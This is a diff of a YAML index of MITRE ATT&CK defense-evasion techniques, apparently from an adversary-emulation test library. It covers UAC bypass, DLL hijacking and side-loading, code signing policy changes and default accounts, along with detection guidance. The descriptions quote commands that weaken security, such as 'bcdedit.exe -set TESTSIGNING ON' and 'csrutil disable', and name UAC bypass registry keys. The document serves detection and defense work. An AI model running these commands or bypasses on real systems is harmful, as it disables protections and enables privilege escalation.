defense-evasion - modified: '2020-07-22T21:36:52.458Z' - created: '2020-01-30T14:24:34.977Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - - Casey Smith - x_mitre_data_sources: - - Windows Registry - - Process command-line parameters - - Process monitoring + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Bypass User Account Control + description: |- + Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. (Citation: TechNet How UAC Works) + + If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box. (Citation: TechNet Inside UAC) (Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows) + + Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as: + + * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) + + Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) + id: attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073 + x_mitre_defense_bypassed: + - Windows User Account Control + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_effective_permissions: + - Administrator + x_mitre_permissions_required: + - Administrator + - User x_mitre_detection: |- There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Monitor process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. @@ -27013,15 +18999,16 @@ defense-evasion: * The sdclt.exe bypass uses the [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe and [HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand Registry keys.(Citation: enigma0x3 sdclt app paths)(Citation: enigma0x3 sdclt bypass) Analysts should monitor these Registry settings for unauthorized changes. - x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - x_mitre_is_subtechnique: true - x_mitre_version: '2.0' - x_mitre_defense_bypassed: - - Windows User Account Control + x_mitre_data_sources: + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + x_mitre_contributors: + - Stefan Kanthak + - Casey Smith + x_mitre_platforms: + - Windows identifier: T1548.002 atomic_tests: - name: Bypass UAC using Event Viewer (cmd) @@ -27251,10 +19238,9 @@ defense-evasion: - Nik Seetharaman, Palantir - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank x_mitre_data_sources: - - Windows event logs - - Process use of network - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' x_mitre_defense_bypassed: - Anti-virus - Application control @@ -27399,10 +19385,10 @@ defense-evasion: COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.' x_mitre_data_sources: - - Windows Registry - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Module: Module Load' + - 'Command: Command Execution' x_mitre_version: '1.0' x_mitre_is_subtechnique: true x_mitre_permissions_required: @@ -27594,10 +19580,9 @@ defense-evasion: Monitor for suspicious modifications or deletion of ConsoleHost_history.txt and use of the Clear-History command. x_mitre_data_sources: - - Process command-line parameters - - PowerShell logs - - File monitoring - - Authentication logs + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Deletion' x_mitre_platforms: - Linux - macOS @@ -27805,9 +19790,9 @@ defense-evasion: or modification of indicator files. Also monitor for suspicious processes interacting with log files. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Deletion' + - 'File: File Modification' + - 'Command: Command Execution' x_mitre_platforms: - Linux - macOS @@ -27918,10 +19903,8 @@ defense-evasion: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").' x_mitre_data_sources: - - API monitoring - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_platforms: - Windows identifier: T1070.001 @@ -28026,20 +20009,17 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-10-19T16:01:22.090Z' + modified: '2021-03-16T12:45:15.399Z' created: '2020-03-13T20:36:57.378Z' x_mitre_platforms: - - AWS - - GCP - - Azure - - SaaS - Azure AD - Office 365 + - SaaS + - IaaS + - Google Workspace x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours. @@ -28047,7 +20027,7 @@ defense-evasion: - User - Administrator x_mitre_is_subtechnique: true - x_mitre_version: '1.1' + x_mitre_version: '1.2' atomic_tests: [] T1553.002: technique: @@ -28091,7 +20071,7 @@ defense-evasion: modified: '2020-02-10T19:51:01.601Z' created: '2020-02-05T16:27:37.784Z' x_mitre_data_sources: - - Binary file metadata + - 'File: File Metadata' x_mitre_defense_bypassed: - Windows User Account Control x_mitre_detection: Collect and analyze signing certificate metadata on software @@ -28103,6 +20083,114 @@ defense-evasion: - macOS - Windows atomic_tests: [] + T1553.006: + technique: + external_references: + - source_name: mitre-attack + external_id: T1553.006 + url: https://attack.mitre.org/techniques/T1553/006 + - source_name: Microsoft DSE June 2017 + url: https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN + description: Microsoft. (2017, June 1). Digital Signatures for Kernel Modules + on Windows. Retrieved April 22, 2021. + - source_name: Apple Disable SIP + url: https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection + description: Apple. (n.d.). Disabling and Enabling System Integrity Protection. + Retrieved April 22, 2021. + - source_name: Microsoft Unsigned Driver Apr 2017 + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test + description: Microsoft. (2017, April 20). Installing an Unsigned Driver during + Development and Test. Retrieved April 22, 2021. + - source_name: Microsoft TESTSIGNING Feb 2021 + url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option + description: Microsoft. (2021, February 15). Enable Loading of Test Signed + Drivers. Retrieved April 22, 2021. + - source_name: FireEye HIKIT Rootkit Part 2 + url: https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html + description: 'Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: + Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.' + - source_name: GitHub Turla Driver Loader + url: https://github.com/hfiref0x/TDL + description: TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved + April 22, 2021. + - url: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf + description: 'F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence + of crimeware and APT attacks. Retrieved March 24, 2016.' + source_name: F-Secure BlackEnergy 2014 + - source_name: Unit42 AcidBox June 2020 + url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/ + description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare + Malware Repurposing Turla Group Exploit Targeted Russian Organizations. + Retrieved March 16, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Code Signing Policy Modification + description: "Adversaries may modify code signing policies to enable execution + of unsigned or self-signed code. Code signing provides a level of authenticity + on a program from a developer and a guarantee that the program has not been + tampered with. Security controls can include enforcement mechanisms to ensure + that only valid, signed code can be run on an operating system. \n\nSome of + these security controls may be enabled by default, such as Driver Signature + Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: + Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls + may be disabled by default but are configurable through application controls, + such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a + system. Since it can be useful for developers to modify default signature + enforcement policies during the development and testing of applications, disabling + of these features may be possible with elevated permissions.(Citation: Microsoft + Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may + modify code signing policies in a number of ways, including through use of + command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), + rebooting the computer in a debug/recovery mode, or by altering the value + of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: + Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub + Turla Driver Loader) Examples of commands that can modify the code signing + policy of a system include bcdedit.exe -set TESTSIGNING ON on + Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING + Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful + modification of a signing policy may require reboot of the compromised system. + Additionally, some implementations can introduce visible artifacts for the + user (ex: a watermark in the corner of the screen stating the system is in + Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure + BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related + to signature checks, such as modifying g_CiOptions to disable + Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege + Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but + vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla + Driver Loader)" + id: attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T15:41:39.155Z' + created: '2021-04-23T01:04:57.161Z' + x_mitre_detection: 'Monitor processes and command-line arguments for actions + that could be taken to modify the code signing policy of a system, such as + bcdedit.exe -set TESTSIGNING ON.(Citation: Microsoft TESTSIGNING + Feb 2021) Consider monitoring for modifications made to Registry keys associated + with code signing policies, such as HKCU\Software\Policies\Microsoft\Windows + NT\Driver Signing. Modifications to the code signing policy of a system + are likely to be rare.' + x_mitre_data_sources: + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'Process: Process Creation' + x_mitre_contributors: + - Abel Morales, Exabeam + x_mitre_defense_bypassed: + - Application control + - User Mode Signature Validation + - Digital Certificate Validation + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_platforms: + - Windows + - macOS + atomic_tests: [] T1027.004: technique: created: '2020-03-16T15:30:57.711Z' @@ -28141,9 +20229,10 @@ defense-evasion: - Praetorian - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank x_mitre_data_sources: - - File monitoring - - Process command-line parameters - - Process monitoring + - 'File: File Metadata' + - 'File: File Creation' + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_detection: 'Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator @@ -28290,9 +20379,9 @@ defense-evasion: x_mitre_is_subtechnique: true x_mitre_version: '1.0' x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'Process: Process Creation' + - 'File: File Creation' + - 'Command: Command Execution' x_mitre_contributors: - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International identifier: T1218.001 @@ -28547,10 +20636,9 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Component firmware - - Process monitoring - - Disk forensics - - API monitoring + - 'Driver: Driver Metadata' + - 'Firmware: Firmware Modification' + - 'Process: OS API Execution' x_mitre_detection: |- Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. @@ -28616,12 +20704,12 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Windows Registry - - DLL monitoring - - Binary file metadata - - API monitoring + - 'Process: Process Creation' + - 'File: File Creation' + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Modification' x_mitre_detection: |- Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014) @@ -28704,21 +20792,16 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:48:08.299Z' + modified: '2021-03-08T10:33:02.034Z' created: '2020-05-14T14:45:15.978Z' x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Creation' x_mitre_permissions_required: - User x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: |- The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity. @@ -28766,10 +20849,8 @@ defense-evasion: Analysts can also monitor for use of Windows APIs such as DuplicateToken(Ex) and CreateProcessWithTokenW and correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_platforms: - Windows atomic_tests: [] @@ -28803,7 +20884,7 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Create Snapshot description: |- - An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence. + An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020) id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1 @@ -28811,9 +20892,9 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-09-14T19:48:08.293Z' + modified: '2021-03-08T10:33:02.060Z' created: '2020-06-09T15:33:13.563Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -28826,39 +20907,23 @@ defense-evasion: Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot": parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME].(Citation: GCP - Creating and Starting a VM) x_mitre_data_sources: - - GCP audit logs - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs + - 'Snapshot: Snapshot Creation' x_mitre_contributors: - Praetorian x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS atomic_tests: [] T1574.001: technique: - created: '2020-03-13T18:11:08.357Z' - modified: '2020-03-26T16:13:58.862Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34 description: |- - Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. + Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution. - There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) + There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637) - Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking) + Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking) - If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. - Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. + If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace. name: DLL Search Order Hijacking created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -28874,10 +20939,18 @@ defense-evasion: url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN description: Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014. - - url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye Hijacking July 2010 + url: https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html + description: Harbour, N. (2010, July 15). Malware Persistence without the + Windows Registry. Retrieved November 17, 2020. + - source_name: OWASP Binary Planting description: OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016. - source_name: OWASP Binary Planting + url: https://www.owasp.org/index.php/Binary_planting + - source_name: FireEye fxsst June 2011 + url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html + description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November + 17, 2020. - source_name: Microsoft Security Advisory 2269637 url: https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637 description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved @@ -28886,32 +20959,41 @@ defense-evasion: url: https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN description: Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020. - - url: https://msdn.microsoft.com/en-US/library/aa375365 + - source_name: Microsoft Manifests description: Microsoft. (n.d.). Manifests. Retrieved December 5, 2014. - source_name: Microsoft Manifests + url: https://msdn.microsoft.com/en-US/library/aa375365 - source_name: FireEye DLL Search Order Hijacking url: https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html description: Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-26T18:37:03.748Z' + created: '2020-03-13T18:11:08.357Z' x_mitre_platforms: - Windows x_mitre_contributors: - Travis Smith, Tripwire - Stefan Kanthak x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - DLL monitoring - - File monitoring + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' x_mitre_detection: Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have - the same file name but abnormal paths. Modifications to or creation of .manifest - and .local redirection files that do not correlate with software updates are - suspicious. + the same file name but abnormal paths. Modifications to or creation of `.manifest` + and `.local` redirection files that do not correlate with software updates + are suspicious. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' identifier: T1574.001 atomic_tests: - name: DLL Search Order Hijacking - amsi.dll @@ -28935,6 +21017,16 @@ defense-evasion: elevation_required: true T1574.002: technique: + created: '2020-03-13T19:41:37.908Z' + modified: '2021-04-26T18:31:34.954Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern external_references: - source_name: mitre-attack external_id: T1574.002 @@ -28942,10 +21034,6 @@ defense-evasion: - external_id: CAPEC-641 source_name: capec url: https://capec.mitre.org/data/definitions/641.html - - source_name: About Side by Side Assemblies - url: https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- - description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved - March 13, 2020. - source_name: FireEye DLL Side-Loading url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in @@ -28955,35 +21043,25 @@ defense-evasion: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: DLL Side-Loading description: |- - Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. + Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s). - Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - - Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process. + Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading) id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:27.807Z' - created: '2020-03-13T19:41:37.908Z' x_mitre_defense_bypassed: - Anti-virus - Application control - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_is_subtechnique: true x_mitre_detection: Monitor processes for unusual activity (e.g., a process that - does not use the network begins to do so). Track DLL metadata, such as a hash, - and compare DLLs that are loaded at process execution time against previous - executions to detect differences that do not correlate with patching or updates. + does not use the network begins to do so) as well as the introduction of new + files/programs. Track DLL metadata, such as a hash, and compare DLLs that + are loaded at process execution time against previous executions to detect + differences that do not correlate with patching or updates. x_mitre_data_sources: - - Loaded DLLs - - Process monitoring - - Process use of network + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' x_mitre_platforms: - Windows identifier: T1574.002 @@ -29035,15 +21113,22 @@ defense-evasion: url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts description: Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019. + - source_name: AWS Root User + url: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html + description: Amazon. (n.d.). AWS Account Root User. Retrieved April 5, 2021. + - source_name: Threat Matrix for Kubernetes + url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + description: Weizman, Y. (2020, April 2). Threat Matrix for Kubernetes. Retrieved + March 30, 2021. - source_name: Metasploit SSH Module url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. + description: Metasploit. (n.d.). Retrieved April 12, 2019. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Default Accounts description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) + Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes) Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d @@ -29057,9 +21142,9 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' + modified: '2021-04-05T20:14:26.846Z' created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' + x_mitre_version: '1.2' x_mitre_is_subtechnique: true x_mitre_permissions_required: - Administrator @@ -29069,20 +21154,18 @@ defense-evasion: for default credentials or SSH keys, and if any are discovered, they should be updated immediately. x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - 